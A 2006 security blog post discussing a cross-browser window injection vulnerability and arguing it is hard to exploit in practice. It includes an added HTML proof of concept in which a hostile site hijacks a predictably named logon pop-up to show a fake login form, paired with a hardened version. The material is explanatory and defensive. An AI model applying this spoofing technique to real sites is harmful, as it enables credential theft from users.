Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

Moderately critical IE7, Firefox, Mozilla, Opera, Safari and Konqueror vulnerability at Secunia

October 30th 2006 in Uncategorized

Jeez, I tell you, this was one *irritating*, in-your-face, damned-obvious-to-anybody-paying-a-modicum-of-attention-that-something-weird-is-going-on vulnerability to check out … listed as 'moderately critical'.

The test works, but only once; you have to refresh the page to get it to work again.

Internet Explorer 7 Window Injection Vulnerability
http://secunia.com/advisories/22628/

To be fair, the vulnerability affects many Web browsers and operating systems.

Web browsers: Internet Explorer, Mozilla, Firefox, Opera, Safari, Konqueror (it looks like FF2 may be immune)

Operating Systems: Windows, Linux variants, UNIX variants, Mac OS

The vulnerability is that a web site can inject content into another site's window if it knows the target name of that window (the second argument to window.open). So, first of all, the hostile site has to be open; then it has to convince you to go to a second site; then it has to know which link you are going to click, so that it can inject content into the window that link opens.

If the hostile site is closed after the other site is opened, the exploit does not work.

Let's be realistic here. For an exploit to be truly successful it has to fool the user easily. The existence of a vulnerability or weakness does not mean it can realistically be exploited; weird or unusual behaviour is going to grab the user's attention.

Imagine, if you will, that you go to a fake bank web site (assuming the page isn't blocked by the phishing filter in the first place); it then has to convince you to click on a link that leads to a legitimate web site, and the owners of the hostile site have to hope that your computer doesn't go nuts from the hundreds of pop-ups per minute that are being generated. The constant clicking of IE7's pop-up-blocked sound cue, as a blizzard of 2 to 3 pop-ups per second is blocked, is a dead giveaway to anybody using IE7 with its default settings that something is wrong.

AusCERT says "This is of particular concern for accessing secure sites which routinely open a new window for user logon with no location bar, since the attacker can overwrite the real logon window with a fake logon window." It should be noted that IE7 displays an address bar on all windows, even logon pop-ups that would normally suppress it, unless the user chooses to turn that option off via the Security settings.
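The mechanism described above (a guessable window name, and a logon pop-up opened with no location bar), as an added demonstration that is not from the original post or from Secunia's test page: one HTML file that plays the bank, the bank's logon form, and the hostile site depending on its query string. The file name, the ports and the window name 'bankLogonWindow' are assumptions. Current browsers restrict the named-target lookup in window.open() to windows the caller is related to (same origin, or the opener chain), so in them the attacker's click merely opens a separate window; the file still shows the shape of the attack, and the hardening a site could apply on its own side at the time: an unguessable per-session window name, and leaving the address bar visible.

```html
<!doctype html>
<!--
  Added demo, not part of the original post or of Secunia's test page.
  Assumed setup (file name, ports and window name are assumptions): save this file as
  inject-demo.html and serve the SAME file from two different origins, e.g.
     http://localhost:8000/inject-demo.html?role=bank        (the "legitimate" site)
     http://127.0.0.1:8001/inject-demo.html?role=attacker    (the "hostile" site)
  Steps: open the bank copy and click "Open logon window"; with that pop-up still open,
  open the attacker copy in another tab and click "Inject fake logon".
  Use ?role=bank-fixed instead of ?role=bank to see the hardened variant.
-->
<html>
<head>
  <meta charset="utf-8">
  <title>Window injection demo</title>
</head>
<body>
  <h1 id="title"></h1>
  <button id="action"></button>
  <pre id="log"></pre>
  <div id="form"></div>
  <script>
    // A fixed, guessable window name. window.open(url, name) targets any existing
    // window with that name; an affected browser does not check whether the caller's
    // origin matches the origin of the page already loaded in that window.
    var LOGON_WINDOW_NAME = 'bankLogonWindow';

    // Minimal query-string reader so the file has no dependencies.
    function param(name) {
      var m = new RegExp('[?&]' + name + '=([^&]*)').exec(location.search);
      return m ? decodeURIComponent(m[1]) : null;
    }

    var role = param('role') || 'bank';
    var title = document.getElementById('title');
    var button = document.getElementById('action');

    function log(msg) {
      document.getElementById('log').textContent += msg + '\n';
    }

    // URL of this same file acting as the logon form, labelled so the reader can see
    // which copy (bank or attacker) drew it.
    function logonUrl(label) {
      return location.pathname + '?role=logon&label=' + encodeURIComponent(label);
    }

    // Bank-side mitigation: a window name the attacker cannot guess. Generated with
    // crypto.getRandomValues() here; a site of that era would generate it server-side
    // per session and embed it in the page.
    function unguessableWindowName() {
      var buf = new Uint8Array(16);
      crypto.getRandomValues(buf);
      var hex = '';
      for (var i = 0; i < buf.length; i++) hex += (buf[i] < 16 ? '0' : '') + buf[i].toString(16);
      return 'logon_' + hex;
    }

    if (role === 'logon') {
      // The logon form itself. Only the label and location.origin tell the copies apart,
      // and with location=no the user never sees the origin.
      title.textContent = param('label') + ' logon at ' + location.origin;
      document.getElementById('form').innerHTML =
        '<form onsubmit="return false">User <input name="u"><br>' +
        'Password <input type="password" name="p"><br>' +
        '<button type="submit">Log on</button></form>';
    } else if (role === 'bank' || role === 'bank-fixed') {
      title.textContent = 'Bank (' + location.origin + ')';
      button.textContent = 'Open logon window';
      button.onclick = function () {
        // role=bank reproduces the vulnerable pattern: predictable name plus location=no.
        // role=bank-fixed uses an unguessable name and keeps the address bar visible.
        var name = role === 'bank' ? LOGON_WINDOW_NAME : unguessableWindowName();
        var features = role === 'bank' ? 'width=420,height=320,location=no'
                                       : 'width=420,height=320,location=yes';
        window.open(logonUrl('Real'), name, features);
        log('Opened logon window named ' + name);
      };
    } else {
      title.textContent = 'Attacker (' + location.origin + ')';
      button.textContent = 'Inject fake logon';
      button.onclick = function () {
        // Same API, same guessed name, different origin. In an affected browser this
        // navigates the bank's existing pop-up to the attacker's form, so the fake form
        // appears inside a window the bank opened. Against role=bank-fixed the name is
        // unknown, so the call can only open a new, unrelated window.
        window.open(logonUrl('FAKE'), LOGON_WINDOW_NAME);
        log('Targeted window named ' + LOGON_WINDOW_NAME);
      };
    }
  </script>
</body>
</html>
```

The two origins matter: served from a single origin the injection works in any browser, because same-origin pages are always allowed to target each other's named windows, and that proves nothing about the bug. The unguessable-name fix only helps if the name is fresh for every logon and never exposed to other sites; the address bar is what lets the user catch the remaining cases.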

Edit: The Microsoft Security Response Team responds:
http://blogs.technet.com/msrc/archive/2006/10/31/information-on-address-bar-issue.aspx

So, to summarise: the attack only has a marginally better chance if the user has turned off the address bar for pop-ups or does not notice that the address is wrong, does not close the hostile web site, has turned off the IE sound cue for a blocked pop-up (or has no sound card or speakers), has turned off the info-bar, or has disabled the pop-up blocker. Even then the site still has to get around the phishing filter, and it has to convince users to trust it when hundreds of pop-ups within a couple of minutes is not normal behaviour for the site being spoofed.

